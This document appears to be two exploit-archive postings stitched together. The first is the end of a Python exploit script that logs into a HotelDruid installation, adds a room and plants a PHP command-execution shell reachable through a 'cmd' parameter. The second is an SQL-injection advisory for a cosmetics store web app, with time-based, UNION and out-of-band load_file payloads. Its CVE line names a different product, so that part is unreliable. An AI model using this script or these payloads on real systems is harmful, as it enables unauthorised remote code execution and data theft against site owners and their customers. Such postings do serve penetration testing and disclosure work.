\______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" parser = argparse.ArgumentParser() req_args = parser.add_argument_group('required arguments') req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) req_args.add_argument("-u" , "--username" , help="Username" , required=False) req_args.add_argument("-p" , "--password" , help="password", required=False) req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) args = parser.parse_args() target = args.target if target[-1] == "/": target = target[:-1] noauth = args.noauth username = args.username password = args.password if noauth == False and (username == None or password == None): print('[-] Please provide the authentication method.' ) quit() print(banner) if not noauth: print(f"[*] Logging in with the credential {username}:{password}") login_result = login(username = username , password = password , target = target) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print("[-] Login failed, Check your credential or check if login is required or not .") quit() else: print('[*] Trying to access the Dashboard.') login_result = login(username = username , password = password , target = target , noauth=True) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') exit() print("[*] Checking the privilege of the user.") if check_privilege(target= target , token=token , anno=anno): print("[+] User has the privilege to add room.") else: print("[-] User doesn't have the privilege to add room.") exit() print("[*] Adding a new room.") if add_room(target = target , anno=anno , token=token): print('[+] Room has been added successfully.') else: print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') exit() print('[*] Testing code exection') output = test_code_execution(target = target) if output != False: print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') print(f"[+] Example Output : {output}") exit() else: print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") exit() main() </code></pre>

<pre><code>## Title: Cosmetics-and-Beauty-Product-Online-Store v1.0 remote SQL-Injections ## Author: nu11secur1ty ## Date: 02.18.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html ## CVE-Medical Store Management System v1.0 ## Description: The search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\vcu'))+' was submitted in the search parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'') AND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'') UNION ALL SELECT 47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47-- - --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store/SQL-Injection) ## Proof and Exploit: [href](https://streamable.com/9b2avg) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>